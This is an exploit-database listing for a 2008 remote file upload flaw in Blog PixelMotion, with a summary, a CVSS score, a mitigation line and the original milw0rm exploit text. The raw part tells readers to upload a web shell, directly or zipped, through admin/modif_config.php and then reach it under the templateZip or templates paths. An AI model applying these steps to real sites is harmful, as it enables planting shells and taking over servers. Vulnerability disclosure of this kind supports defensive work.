header-logo
Suggest Exploit
vendor:
Blog PixelMotion
by:
jiko [jiki team]
7.5
CVSS
HIGH
Remote File Upload Vulnerability
434
CWE
Product Name: Blog PixelMotion
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote File Upload Vulnerability

Users can upload a malicious file to the server by exploiting the vulnerability in the modif_config.php page. The malicious file can be uploaded either directly or in a compressed zip format. After the file is uploaded, it can be accessed from the templates folder.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the expected file extensions and size.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko [jiki team]
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blog PixelMotion 
# Bug   : Remote File Upload Vulnerability
# Download  : http://www.pixelmotion.org/zip/blog.zip
 
=========================JIkI Team===================
# Exploit  :
uploa your shell  
  http://[Site]/[script]/admin/modif_config.php
http://[Site]/[script]/templateZip/[shell]
###################OR################
upload your shell compressed by Zip forme
  http://[Site]/[script]/admin/modif_config.php
after upload your shell go to
  http://[Site]/[script]/templates/[shell]
because your sheel has extract at templates
and has upload at templateZip
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-06]